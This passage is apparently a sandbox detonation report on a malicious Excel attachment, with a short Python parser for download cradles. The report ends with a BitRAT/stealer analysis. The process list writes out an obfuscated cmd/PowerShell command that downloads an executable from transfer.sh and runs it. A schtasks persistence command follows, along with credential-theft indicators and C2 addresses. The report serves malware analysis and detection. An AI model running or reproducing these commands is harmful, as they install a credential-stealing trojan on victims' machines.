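    m = re.match(r"^\S*cmd(?:\.exe)?\s+/c\s+(.*)$", cmdline, re.IGNORECASE)
    body = m.group(1) if m else cmdline
    return re.sub(r"^(\S+?)/", r"\1 /", body, count=1)


def parse_cradle(raw: str) -> Cradle:
    command = inner_command(strip_cmd_escapes(raw))
    ws = re.search(r"(?:^|\s)[-/]w(?:indowstyle)?\s+(\d+)", command, re.IGNORECASE)
    url = re.search(r"https?://[^\s;'\"]+", command)
    out = re.search(r"\s-o(?:utfile)?\s+([^\s;]+)", command, re.IGNORECASE)
    # Everything after a ';' is a further PowerShell statement; a bare path there is executed.
    executes = [s.strip() for s in command.split(";")[1:] if s.strip()]
    return Cradle(
        command=command,
        program=command.split()[0],
        window_style=WINDOW_STYLES.get(int(ws.group(1))) if ws else None,
        url=url.group(0) if url else None,
        out_path=out.group(1) if out else None,
        executes=executes,
    )


def is_download_and_execute(c: Cradle) -> bool:
    """True when a remote file is fetched to disk and that same path is then run."""
    return bool(c.url and c.out_path
                and c.out_path.lower() in (e.lower() for e in c.executes))


if __name__ == "__main__":
    print(parse_cradle(RAW_CMDLINE))
```

Note that in this Win7 run the Network section is empty and no l6hv4.exe process appears, so the cradle was launched but the payload never arrived; the stealer and persistence behaviour is only observed in behavioral2, where the same command succeeded.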

Network

N/A

Files

memory/2148-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2148-1-0x0000000071D4D000-0x0000000071D58000-memory.dmp

memory/2148-4-0x0000000005E90000-0x0000000005F90000-memory.dmp

memory/2616-7-0x000000006B8F0000-0x000000006BE9B000-memory.dmp

memory/2616-8-0x000000006B8F0000-0x000000006BE9B000-memory.dmp

memory/2616-9-0x00000000027A0000-0x00000000027E0000-memory.dmp

memory/2616-10-0x000000006B8F0000-0x000000006BE9B000-memory.dmp

memory/2148-11-0x0000000071D4D000-0x0000000071D58000-memory.dmp

memory/2148-12-0x0000000005E90000-0x0000000005F90000-memory.dmp

memory/2148-13-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2148-14-0x0000000071D4D000-0x0000000071D58000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-09-18 18:21

Reported

2023-09-18 18:23

Platform

win10v2004-20230915-en

Max time kernel

148s

Max time network

154s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\RomaniaRequestImunSRL092023_JC.xls"

Signatures

BitRAT

trojan bitrat

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SYSTEM32\cmd.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

XenArmor Suite

recovery password xenarmor

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

ACProtect 1.3x - 1.4x DLL software

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Public\l6hv4.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads local data of messenger clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Users\Public\l6hv4.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Public\l6hv4.exe N/A
N/A N/A C:\Users\Public\l6hv4.exe N/A
N/A N/A C:\Users\Public\l6hv4.exe N/A
N/A N/A C:\Users\Public\l6hv4.exe N/A
N/A N/A C:\Users\Public\l6hv4.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3476 set thread context of 2196 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 4436 set thread context of 5068 N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe C:\Users\Admin\AppData\Roaming\uno\uno.exe
PID 2196 set thread context of 1164 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 1164 set thread context of 1500 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 492 set thread context of 4460 N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe C:\Users\Admin\AppData\Roaming\uno\uno.exe

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\uno\uno.exe

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Public\l6hv4.exe N/A
N/A N/A C:\Users\Public\l6hv4.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Public\l6hv4.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Public\l6hv4.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3292 wrote to memory of 4752 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\SYSTEM32\cmd.exe
PID 3292 wrote to memory of 4752 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\SYSTEM32\cmd.exe
PID 4752 wrote to memory of 3004 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4752 wrote to memory of 3004 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3004 wrote to memory of 3476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\l6hv4.exe
PID 3004 wrote to memory of 3476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\l6hv4.exe
PID 3004 wrote to memory of 3476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\l6hv4.exe
PID 3476 wrote to memory of 2196 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 3476 wrote to memory of 2196 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 3476 wrote to memory of 2196 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 3476 wrote to memory of 2196 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 3476 wrote to memory of 2196 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 3476 wrote to memory of 2196 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 3476 wrote to memory of 2196 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 3476 wrote to memory of 2196 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 3476 wrote to memory of 2196 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 3476 wrote to memory of 2196 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 3476 wrote to memory of 2196 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 3476 wrote to memory of 1452 N/A C:\Users\Public\l6hv4.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 1452 N/A C:\Users\Public\l6hv4.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 1452 N/A C:\Users\Public\l6hv4.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 824 N/A C:\Users\Public\l6hv4.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 824 N/A C:\Users\Public\l6hv4.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 824 N/A C:\Users\Public\l6hv4.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 3456 N/A C:\Users\Public\l6hv4.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 3456 N/A C:\Users\Public\l6hv4.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 3456 N/A C:\Users\Public\l6hv4.exe C:\Windows\SysWOW64\cmd.exe
PID 824 wrote to memory of 2076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 824 wrote to memory of 2076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 824 wrote to memory of 2076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4436 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe C:\Users\Admin\AppData\Roaming\uno\uno.exe
PID 4436 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe C:\Windows\SysWOW64\cmd.exe
PID 4436 wrote to memory of 3096 N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe C:\Windows\SysWOW64\cmd.exe
PID 4436 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 1324 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2196 wrote to memory of 1164 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 1164 wrote to memory of 1500 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\RomaniaRequestImunSRL092023_JC.xls"

C:\Windows\SYSTEM32\cmd.exe

cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/qyAOUa1rJz/Betro.e^xe -o C:\Users\Public\l6hv4.exe;C:\Users\Public\l6hv4.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell /W 01 curl https://transfer.sh/get/qyAOUa1rJz/Betro.exe -o C:\Users\Public\l6hv4.exe;C:\Users\Public\l6hv4.exe

C:\Users\Public\l6hv4.exe

"C:\Users\Public\l6hv4.exe"

C:\Users\Public\l6hv4.exe

"C:\Users\Public\l6hv4.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\uno"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c copy "C:\Users\Public\l6hv4.exe" "C:\Users\Admin\AppData\Roaming\uno\uno.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\uno\uno.exe'" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\uno\uno.exe'" /f

C:\Users\Admin\AppData\Roaming\uno\uno.exe

C:\Users\Admin\AppData\Roaming\uno\uno.exe

C:\Users\Admin\AppData\Roaming\uno\uno.exe

"C:\Users\Admin\AppData\Roaming\uno\uno.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\uno"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\uno\uno.exe'" /f

C:\Windows\SysWOW64\cmd.exe

"cmd" /c copy "C:\Users\Admin\AppData\Roaming\uno\uno.exe" "C:\Users\Admin\AppData\Roaming\uno\uno.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5068 -ip 5068

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\uno\uno.exe'" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 188

C:\Users\Public\l6hv4.exe

-a "C:\Users\Admin\AppData\Local\f9be9104\plg\v54SCiHA.json"

C:\Users\Public\l6hv4.exe

-a "C:\Users\Admin\AppData\Local\Temp\unk.xml"

C:\Users\Admin\AppData\Roaming\uno\uno.exe

C:\Users\Admin\AppData\Roaming\uno\uno.exe

C:\Users\Admin\AppData\Roaming\uno\uno.exe

"C:\Users\Admin\AppData\Roaming\uno\uno.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\uno"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\uno\uno.exe'" /f

C:\Windows\SysWOW64\cmd.exe

"cmd" /c copy "C:\Users\Admin\AppData\Roaming\uno\uno.exe" "C:\Users\Admin\AppData\Roaming\uno\uno.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\uno\uno.exe'" /f

Network

Country  Destination          Domain                          Proto
US       8.8.8.8:53           17.160.190.20.in-addr.arpa      udp
US       8.8.8.8:53           18.89.109.52.in-addr.arpa       udp
US       8.8.8.8:53           241.154.82.20.in-addr.arpa      udp
US       8.8.8.8:53           41.110.16.96.in-addr.arpa       udp
US       8.8.8.8:53           95.221.229.192.in-addr.arpa     udp
US       8.8.8.8:53           88.156.103.20.in-addr.arpa      udp
US       8.8.8.8:53           transfer.sh                     udp
DE       144.76.136.153:443   transfer.sh                     tcp
US       8.8.8.8:53           54.120.234.20.in-addr.arpa      udp
US       8.8.8.8:53           153.136.76.144.in-addr.arpa     udp
US       8.8.8.8:53           58.189.79.40.in-addr.arpa       udp
US       8.8.8.8:53           56.126.166.20.in-addr.arpa      udp
US       8.8.8.8:53           50.23.12.20.in-addr.arpa        udp
US       8.8.8.8:53           126.209.247.8.in-addr.arpa      udp
NL       185.225.75.68:3569   -                               tcp
US       8.8.8.8:53           68.75.225.185.in-addr.arpa      udp
NL       185.225.75.68:3569   -                               tcp
US       8.8.8.8:53           19.229.111.52.in-addr.arpa      udp
US       8.8.8.8:53           www.xenarmor.com                udp
US       69.64.94.128:80      www.xenarmor.com                tcp
US       8.8.8.8:53           128.94.64.69.in-addr.arpa       udp
NL       185.225.75.68:3569   -                               tcp
US       8.8.8.8:53           84.65.42.20.in-addr.arpa        udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tahbtkkl.cfd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Public\l6hv4.exe

MD5 1c9f3c0258e923c07e1943498c789a3d
SHA1 e908faaa5eff19c6b653241253ecc6f28c83f436
SHA256 925329eac4d8dfc71dfd0d222e935b31fb340bbb70367c7abf6553d921b64e55
SHA512 92c16e56ae3d830e2110f97159d6f19fbf91b8bc56d29be207a0da12bd388a0fe68dd13c63dba5266d7d48be9f423d75c1e1e3ec16e6ad1458940f0bb0d0cb0b

C:\Users\Admin\AppData\Roaming\uno\uno.exe

MD5 1c9f3c0258e923c07e1943498c789a3d
SHA1 e908faaa5eff19c6b653241253ecc6f28c83f436
SHA256 925329eac4d8dfc71dfd0d222e935b31fb340bbb70367c7abf6553d921b64e55
SHA512 92c16e56ae3d830e2110f97159d6f19fbf91b8bc56d29be207a0da12bd388a0fe68dd13c63dba5266d7d48be9f423d75c1e1e3ec16e6ad1458940f0bb0d0cb0b

C:\Users\Public\Unknown.dll

MD5 86114faba7e1ec4a667d2bcb2e23f024
SHA1 670df6e1ba1dc6bece046e8b2e573dd36748245e
SHA256 568da887725ccfdc4c5aae3ff66792fe60eca4e0818338f6a8434be66a6fe46d
SHA512 d26ee0da6ccd4022982cf848c46e40f6781b667e39d0c5daf5ea8d74c44e55c55a5f7590a4d2a60aa1911358ca783c4276a9b4e6311c4cea20df1ebd4f7f457f

C:\Users\Public\License.XenArmor

MD5 4f3bde9212e17ef18226866d6ac739b6
SHA1 732733bec8314beb81437e60876ffa75e72ae6cd
SHA256 212173a405c78d70f90e8ec0699a60ed2f4a9f3a8070de62eabd666c268fb174
SHA512 10b7cdae0b9a7b0f8e1bfc66a60675fa9b25c523864d5ae3da243f4e6e4c5194f3bd92af57ac956157442f66414bdd3393d0a1e5ba4ef0f192561e8524d4e744

C:\Users\Admin\AppData\Local\Temp\unk.xml

MD5 ce3e2f5f04eff81b3b7130a90a8e3a6e
SHA1 fe9ac39d1db0a28aeef54741003d3f639125dc1c
SHA256 b45d1dda071c8ee6b1078e8f71661ee1511887daf491a9f81415232a3c3bd631
SHA512 8cd831f9231cc30eeed546b47401459a2737d160faf0eacc823d286de22f79d68a95b994dce1f1eb6e7fa96e24aadeac50659115afe74148a33e6d31012ed357

C:\Users\Public\License.XenArmor

MD5 bf5da170f7c9a8eae88d1cb1a191ff80
SHA1 dd1b991a1b03587a5d1edc94e919a2070e325610
SHA256 e5d5110feb21939d82d962981aeaaafc4643b40a9b87cbed800ace82135d57cd
SHA512 9e32247d8556fd6efffbf7b6b9c325652d8c4b223b0fa38020879171476a49ab1f64d8897b5d8d92b79c5484fd9d5899be26ca5f664ee1f9c2acb0857084121e

C:\Users\Admin\AppData\Local\f9be9104\plg\v54SCiHA.json

MD5 ce3e2f5f04eff81b3b7130a90a8e3a6e
SHA1 fe9ac39d1db0a28aeef54741003d3f639125dc1c
SHA256 b45d1dda071c8ee6b1078e8f71661ee1511887daf491a9f81415232a3c3bd631
SHA512 8cd831f9231cc30eeed546b47401459a2737d160faf0eacc823d286de22f79d68a95b994dce1f1eb6e7fa96e24aadeac50659115afe74148a33e6d31012ed357

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\uno.exe.log

MD5 03febbff58da1d3318c31657d89c8542
SHA1 c9e017bd9d0a4fe533795b227c855935d86c2092
SHA256 5164770a37b199a79ccd23b399bb3309228973d9f74c589bc2623dc613b37ac4
SHA512 3750c372bbca1892e9c1b34681d592c693e725a8b149c3d6938079cd467628cec42c4293b0d886b57a786abf45f5e7229247b3445001774e3e793ff5a3accfa3
